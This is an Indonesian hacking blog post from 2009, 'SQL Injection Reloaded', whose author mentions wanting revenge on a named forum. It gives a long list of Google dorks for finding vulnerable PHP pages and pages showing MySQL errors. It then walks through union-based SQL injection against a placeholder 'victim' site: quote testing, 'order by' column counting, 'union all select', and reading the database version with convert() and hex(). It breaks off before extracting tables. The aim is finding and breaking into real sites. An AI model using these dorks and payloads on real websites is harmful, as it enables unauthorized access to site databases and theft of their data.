-[†]- Darkness Hacker -[†]-: SQL Injection Reloaded

Duh, tadi mau membalas dendam pada forum para orang gila yaitu www.clancbs.com (saya gak tau kenapa bisa sebenci ini sama ntuh forum...)
Tapi becanda... coba aja liat di cerita Darkness Hacker biar tau apa alasannya... (and why it's invulnerable to SQLi???)
OK, saya baru ketemu sama SQLi menurut mpu Marezzi di www.milw0rm.com (Baru terbuka matanya en saya udah gak males baca Inggris lagi...) koq rasanya saya ketagihan SQLi yaa??? (soalnya kemaren cuma bolak-balik XSS aka Cross Site Scripting)
OK, kita ikutin aja deh si om Marezzi...
1. Cari korban digoogle (Semuanya ada di Google, kecuali gua dengan dork nama asli gw...)
dengan dork super banyak ini:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

WOW!!! Buanyak buanget suanget kuebeluet matiet en dibeluit-beluit (APA SEEH?????)

Jika udah ketemu, misal: www.korbansqli.com/news.php?id=5
1. Tambah single quote (') pada belakang URL, contoh: www.korbansqli.com/news.php?id=5'
2. Cari angka dalam columns: tambahkan dibelakan URL: order by 1/* contoh: www.korbansqli.com/news.php?id=5 order by 1/*
angka 1 untuk menghitung angka, jadi, jika tidak ada error, ganti nomor 2, jika tidak ada error juga, ganti jadi 3 dan seterusnya, contoh:
www.korbansqli.com/news.php?id=5 order by 1/* =Gak error
www.korbansqli.com/news.php?id=5 order by 2/* =Gak error
www.korbansqli.com/news.php?id=5 order by 3/* =Gak error
www.korbansqli.com/news.php?id=5 order by 4/* =ERROR

Nah, kalo error-nya di 4, berarti ada 3 angka
3. Cek UNION Function
Tambahkan di belakang URL: union all select 1,2,3/* Contoh: www.korbansqli.com/news.php?id=5 union all select 1,2,3/*
Jika ada tulisan contoh: 1 atau 2 atau 3 berarti UNION-nya bekerja...
4. Cek MySQL Version
NOTE: kalo diatas (3) UNION-nya gak bisa, coba /* diganti --
Contohnya, di layar ada angka 2, nah, angka 2 pada URL diganti @@version atau version() dan anda akan mendapat 4.1.33-log atau 5.0.45 atau semacamnya
Jika anda mendapatkan "union + illegal (IMPLICIT + COERCIBLE)..."
Yang kita butuhkan adalah convert()
Contoh: www.korbansqli.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
Atau memakai hex() atau unhex():
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version using latin1)),3/*
Dan kamu dapet MySQL Version...
5. Mendapatkan nama Table dan Column
TO BE CONTINUED (TERLALU BANYAK)

-[†]- Darkness Hacker -[†]-

Shoutmix!!!

PINDAH KE http://neodark.co.tv/

Translator

Jumat, 04 September 2009

SQL Injection Reloaded

Tidak ada komentar:

Posting Komentar

Welcome to Darkness Hacker

Status Update (Ala Darkness Hacker)

Menu

Entri Pentink!

Mau tukeran link?

Another Link

My Friends

Tentang Penulis

Search

Facebook Badge

Subscribe via email

Pengikut

Arsip Blog

Label

Other

FEEDJIT Live Traffic Feed

wibiya widget

Another one

Logo Darkness Hacker lainnya

ShinyStat